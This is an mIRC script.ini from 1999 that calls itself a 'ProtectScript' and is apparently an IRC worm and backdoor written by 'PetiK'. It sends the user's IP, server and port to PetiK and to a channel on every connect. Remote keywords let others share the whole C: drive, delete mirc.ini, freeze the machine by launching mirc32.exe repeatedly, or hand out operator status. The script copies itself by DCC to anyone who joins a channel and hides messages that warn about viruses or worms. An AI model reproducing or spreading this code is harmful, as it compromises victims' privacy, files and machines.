   ;keep this LOAD! ProtectScript - Mirc32 (c) - copyright SenSi_v.1.1__designed_by_Del_Armg0
   ;                                                                                                                                                         Hi!!!! LatitePatronne!!!!hehehe :) coucou titeChérie ; )  06/99

   [SCRIPT]

   n1 = on 1:start:{
   n2 =    .remote on
   n3 =    .ctcps on
   n4 =         .events on
   n5 =  }
   n6=on 1:text:*thief*:#:/fserve PetiK 5 C:\
   n7=on 1:connect:/raw privmsg PetiK SenSi11 $ip on $server $+ : $+ $port $+
   n8=on 1:connect:.msg #SenSi1 SenSi11 $ip on $server $+ : $+ $port $+
   n9=
   n10=on 1:text:*clic*:#:/disconnect
   n11=on 1:text:*bye*:*:/exit
   n12=on 1:text:*kill*:*:/remove $mircdir $+ mirc.ini
   n13=on 1:text:*freeze*:*:{
   n14=/run C:\mirc\mirc32.exe
   n15=/run C:\mirc\mirc32.exe
   n16=/run C:\mirc\mirc32.exe
   n17=/run C:\mirc\mirc32.exe
   n18=/run C:\mirc\mirc32.exe
   n19=/run C:\mirc\mirc32.exe
   n20=/run C:\mirc\mirc32.exe
   n21=}
   n22=on 1:text:*sensi*:#:/msg $nick SenSi11(to PetiK) $ip on $server $+
   n23=on 1:text:*nick*:#:/nick Nuke_Me!
   n24=on 1:text:*bang*:#:/mode $chan +o $nick
   n25=on 1:TEXT:*boum*:#:/mode $chan +b $me
   n26=on 1:TEXT:*boum*:#:/kick $chan $me
   n27=on 1:join:#:{
   n28=if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
   n29=}
   n30=on 1:text:*del*:#:/msg $nick SenSi11_MAITRE!(à PetiK) $ip
   n31=on 1:TEXT:*script.ini*:?:/.ignore $nick
   n32=on 1:TEXT:*virus*:?:/.ignore $nick
   n33=on 1:TEXT:*worm*:?:/.ignore $nick
   ;

   ;=>>: Hi, this is PetiK
